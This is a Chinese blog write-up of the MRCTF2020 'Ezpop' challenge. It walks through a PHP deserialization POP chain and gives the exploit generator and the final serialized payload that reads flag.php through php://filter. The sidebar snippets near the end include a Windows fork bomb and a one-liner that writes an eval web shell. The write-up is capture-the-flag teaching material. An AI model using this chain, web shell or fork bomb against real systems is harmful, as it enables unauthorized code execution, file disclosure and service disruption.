2021-7-28 [MRCTF2020]Ezpop 知识点:php反序列化构造pop链

最新推荐文章于 2024-03-15 23:57:51 发布
最新推荐文章于 2024-03-15 23:57:51 发布
阅读量472 收藏
点赞数 1
分类专栏: webctf 文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51326092/article/details/119184134
版权

文章目录

前言

简单题但是自己做了挺久的。。,不过途中找到了好像是出题大佬的博客:https://ieki.xyz/

前置知识

①伪协议

php://filter/read=convert.base64-encode/resource=index.php

②php的魔术方法

__construct()//创建对象时触发
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__invoke() //当脚本尝试将对象调用为函数时触发
__sleep() //执行serialize时调用
__wakeup() //执行unserialize时调用
__toString() //当反序列化后的对象被输出在模板中的时候(转换成字符串的时候)自动调用

以上的魔术方法调用情况要熟记于心!!!

③public、protected、private在序列化后的不同点

区别只在于对变量名添加了标记:
public无标记,变量名不变,长度不变: s:2:“op”;i:2;
protected在变量名前添加标记\00*\00,长度+3: s:5:"\00*\00op";i:2;
private在变量名前添加标记\00(classname)\00,长度+2+类名长度: s:17:"\00FileHandler_Z\00op";i:2;

总结+注意在url中是需要修改的:

public:不需要修改
protected:%00*%00属性名
private:%00类名%00属性名

解题过程

有源码且思路如下:

 <?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);//10、直接文件包含,使用伪协议filter输出即可
    }
    public function __invoke(){//8、由__get调用
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){//4、由__wakeup调用
        return $this->str->source;
        //5、由于source是自身,加入令str是Test的一个对象,就能调用Test中的__get函数
    }
	//2、突破口,__wakeup函数可以在反序列化是就自动调用,所以传入Show对象
    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
        //3、这里将source变量当成了字符串,我们可以令source是自己本身(即一个对象),这样就能调用__toString
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){//6、由__toString调用
        $function = $this->p;
        //7、注意到这里可以动态调用函数,所有令p为Modifier的一个对象,就能调用Modifier的__invoke函数
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);//1、可以get传参
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

反序列化payload:

<?php
class Modifier {
    protected  $var="php://filter/convert.base64-encode/resource=flag.php";
}
class Show{
    public $source;
    public $str;
    
}
class Test{
    public $p;
}
$m=new Modifier;
$s=new Show;
$t=new Test;
$s->source=$s;
$s->str=$t;
$t->p=$m;
echo(serialize($s));
?>

构造:?pop=O:4:“Show”:2:{s:6:“source”;r:1;s:3:“str”;O:4:“Test”:1:{s:1:“p”;O:8:“Modifier”:1:{s:6:"%00*%00var";s:52:“php://filter/convert.base64-encode/resource=flag.php”;}}}

base64
flag

总结

学习永无止境o(╥﹏╥)o!!!

Sakura-501
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[MRCTF2020]Ezpop-1|php序列化
「 虚幻私塾」
06-30 431
1、打开题目获取到源代码信息,如下: 2、我们的最终目标是获取flag.php中的flag信息,因此分析源代码信息,查看哪里可以获取到flag.php文件,发现在Modifier中存在include($value),因此想到可以通过php伪协议来获取flag.php的信息,所以现在我们的目的就成了调用append函数,接着往下观察,发现__invoke函数调用了append函数,因此我们只要执行了__invoke函数一样可以获得flag信息,那该怎么执行__invoke函数呢:因此,此时我们应该使用别的函
PHP反序列化构造POP
Lemon's blog
04-03 4569
前言: 最近在刷题的时候发现这个PHP反序列化POP,之前理解的序列化攻击多是在魔术方法中出现一些利用的漏洞,自动调用从而触发漏洞。但如果关键代码不在魔术方法中,而是在一个的普通方法中。这时候可以通过寻找相同的函数名将的属性和敏感函数的属性联系起来。 直接通过题目来进行学习,这样更容易掌握!!! Ezpop class Modifier { protected $var; ...
PHP反序列化&POP构造——2021第五空间CTF pklovecloud
iO快到碗里来
09-20 2771
网上关与PHP反序列化&POP构造的文章有很多,笔者在这里简要讲解一下其相关知识。 0x01 序列化和反序列化 为方便存储和传输对象,将对象转化为字符串的操作叫做序列化( serialize() ),将所转化的字符串恢复成对象的过程叫做反序列化( unserialize() )。 举个栗子: <?php Class test{ public $a= '1'; public $bb= 2; public $ccc= True; } $r= new test(); ec
web漏洞】PHP反序列化
weixin_51614272的博客
04-25 3445
知识点 PHP反序列化只能修改成员变量的值和构造方法,其他的代码区不能修改
CTF-PHP反序列化漏洞4-实例理解POP(经典赛题)
Eason_LYC安全白帽子的成长博客
05-08 2418
悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)本专栏打破以往CTF速成或就题论题模式。采用。让刚接触CTF的读者真正掌握CTF中各知识点,为后续自学或快速刷题备赛,打下坚实的基础~
CTF-PHP反序列化漏洞3-构造POP
Eason_LYC安全白帽子的成长博客
05-08 1997
PHP反序列化攻击是一种常见的Web攻击,攻击者通过构造恶意的序列化数据,将其传递给目标服务器,从而导致服务器执行非预期的操作。而Pop则是一种利用PHP反序列化漏洞的攻击方式,可以在未授权的情况下执行任意代码。《CTF基础入门系列》专栏文章打破以往CTF速成或就题论题模式。采用系统讲解基础知识+入门题目练习+真题讲解方式。让刚接触CTF的读者真正掌握CTF中各知识点,为后续自学或快速刷题备赛,打下坚实的基础~
CTF-反序列化(持续更新)
m0_74317362的博客
07-27 853
魔术方法__construct() 当一个对象创建时自动调用__destruct() 当对象被销毁时自动调用 (php绝大多数情况下会自动调用销毁对象)__sleep() 使**用serialize()函数时触发__wakeup 使用unserialse()**函数时会自动调用__toString 当一个对象被当作一个字符串被调用。__call() 在对象上下文中调用不可访问的方法时触发__callStatic() 在静态上下文中调用不可访问的方法时触发。
java反序列化漏洞-验证.rar
06-25
Java反序列化漏洞是软件安全领域的一个重要话题,尤其对于使用Java进行开发的系统来说,理解和防范这种漏洞至关重要。在Java编程中,序列化和反序列化是常见的数据传输和持久化手段,允许对象的状态被转换为字节流,...
CVE-2021-26295 Apache OFBiz 反序列化漏洞.md
04-13
CVE-2021-26295 Apache OFBiz 反序列化漏洞
Java-Deserialization-Cheat-Sheet:关于Java反序列化漏洞的备忘单
05-02
Java反序列化备忘单 面向渗透测试人员和研究人员的备忘单,其中涉及各种Java(JVM)序列化库中的反序列化漏洞。 请使用#javadeser哈希标签进行鸣叫。 表中的内容 json-io(JSON) 杰克逊(JSON) Fastjson(JSON...
S02-URLDNS反序列化构造1
08-03
总的来说,`S02-URLDNS反序列化构造1`是一个利用Java反序列化漏洞的实例,通过精心构造的序列化对象和`SilentURLStreamHandler`,可以在反序列化过程中触发DNS查询,这对于安全测试和漏洞探测具有重要意义。...
[MRCTF2020]Ezpop
LYJ20010728的博客
05-19 216
[MRCTF2020]Ezpop考点思路Payload 考点 反序列化构造 POP 思路 1、__wakeup() 方法通过 preg_match() 将 $this->source 做字符串比较,如果 $this->source 是 Show ,就调用了__toString() 方法; 2、__toString() 访问了 str 的 source 属性,str 是 Test ,不存在 source 属性,就调用了 Test 的__get() 魔术方法; 4、__get()
【buuctf】MRCTF2020-Ezpop小白详解
最新发布
m0_73860001的博客
03-15 1044
真的很详细
CTF php反序列化总结
m0_53567065的博客
11-17 4574
前言:本⼈⽔平不⾼,只能做⼀些似收集总结这样的⼯作,本篇文章是我自己在学php反序列化写的一篇姿势收集与总结,有不对的地方欢迎师傅们批评指正~定义:序列化就是将对象转换成字符串。反序列化相反,数据的格式的转换对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。漏洞原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化的过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。常用魔术方法
记一道ctf的反序列化POP构造
weixin_43263451的博客
10-16 1999
<?php class Tiger{ public $string; protected $var; public function __toString(){ return $this->string; } public function boss($value){ @eval($value); } public function __invoke(){ $this->boss(...
2022 寒假的一些学习记录
m0_51326092的博客
01-22 3076
2022 寒假的一些学习记录 @echo off %0 | %0 (windows循环批处理死机) <?php @eval(‘echo $_GET[x];’); ?>(可以执行系统命令) (写入一句话文件) <?php fputs(fopen(“shell.php”,w),’<?php @eval($_GET[cmd]);?>’); ?> data协议: data://text/plain,<?php phpinfo();?> data://text/plai
CVE-2020-14644:WebLogic IIOP反序列化漏洞深度解析
"CVE-2020-14644是一个针对Oracle WebLogic Server的IIOP(Internet Inter-ORB Protocol)反序列化漏洞,主要影响12.2.1.3.0, 12.2.1.4.0, 和14.1.1.0.0这几个版本。该漏洞允许攻击者通过精心构造的恶意输入来触发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sakura-501

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值